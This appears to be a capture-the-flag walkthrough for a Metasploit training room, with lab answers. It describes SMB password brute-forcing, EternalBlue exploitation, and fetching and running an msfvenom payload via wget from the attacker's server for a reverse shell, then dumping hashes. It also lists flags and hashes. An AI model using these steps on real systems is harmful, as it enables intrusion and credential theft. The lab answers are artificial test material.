Introduction

Start the AttackBox and run Metasploit using the msfconsole command to follow along this room

No answer needed

Scanning

How many ports are open on the target system?

Run nmap -A -p- IP to get all open ports.

5

Using the relevant scanner, what NetBIOS name can you see?

Run sudo nmap -sV IP --script nbstat.nse -v. In the results you will get a list of names.

ACME IT SUPPORT Note: You can also get the answer by running nmap -A -p- IP but using specified scripts i something you should get used to.

What is running on port 8000?

webfs/1.21

What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.

search for "smb_login" on metasploit and use the module. Set the RHOST to the target IP, set the PASS_FILE to the path of the wordlist provided by THM and set the SMBUSER to "penny". Run the module and you get the answer.

leo1234

The Metasploit Database

No answer needed

No answer needed

Vulnerability Scanning

Who wrote the module that allows us to check SMTP servers for open relay?

Campbell Murray

Exploitation

Exploit one of the critical vulnerabilities on the target VM

No answer needed

What is the content of the flag.txt file?

Run nmap -A -p- IP you will get the information that the port 445 gives you the service pack "Windows 7 Professional 7601 Service Pack 1 microsoft-ds". Researching the service-pack you will find info about the "eternalblue"-vulnerability. Search for "eternalblue" in metasploit and select the first module. Set the RHOSTS to the IP of your target and set the SMBDomain to "."(optional). Set your payload to "generic/shell_bind_tcp" and run the exploit.

Note: You can use other payloads for this task but for me the shell_bin_tcp payload works best.

After the shell is established you can navigate to the file that is located in "/users/jon/Documents/flag.txt". Use more to get the flag.

THM-5455554845

What is the NTLM hash of the password of the user "pirate"?

To get the hash you have to use a hashdump module. By looking on the hashdump-models available for the target-system (windows) you will see that there are only modules available that use meterpreter. Therefore you have to use the "Eternalblue"-exploit with a meterpreter-payload. Once the exploit is running you can background the session and use "search hashdump" to find the "post/windows/gather/hashdump"-module. Set the session to the "Eternalblue"-session and run the module. If executed successfully you get the hashes including the answer:

8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.

No answer needed

Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).

No answer needed

Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_10.10.222.125:9000/shell.elf to download it to the target machine).

No answer needed

Get a meterpreter session on the target machine.

No answer needed

Use a post exploitation module to dump hashes of other users on the system.

No answer needed

What is the other user's password hash?

Follow the instructions provided by thm to generate a .elf file. Use python3 -m http.server PORT on your machine to open a server. On the THM-machine use sudo su to become root and then wget IP:PORT/rev_shell.elf to download the generated payload. Make the payload executable by using chmod 777 rev_shell.elf. On your device start a listener using metasploit. Search for the "multi/handler"-module and select the "linux/x86/meterpreter/reverse_tcp"-payload set LHOST and LPORT to the IP and the PORT that you specified while creating the payload and start the handler. On the THM-machine execute the payload by using ./rev_shell.elf. After the reverse-shell is established you can background the session and use search hashdump and use linux/gather/hashdump to select the hashdump-module. Set the session to the meterpreter-listener and run the module to get the requested hashes.

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Summary

No answer needed

No answer needed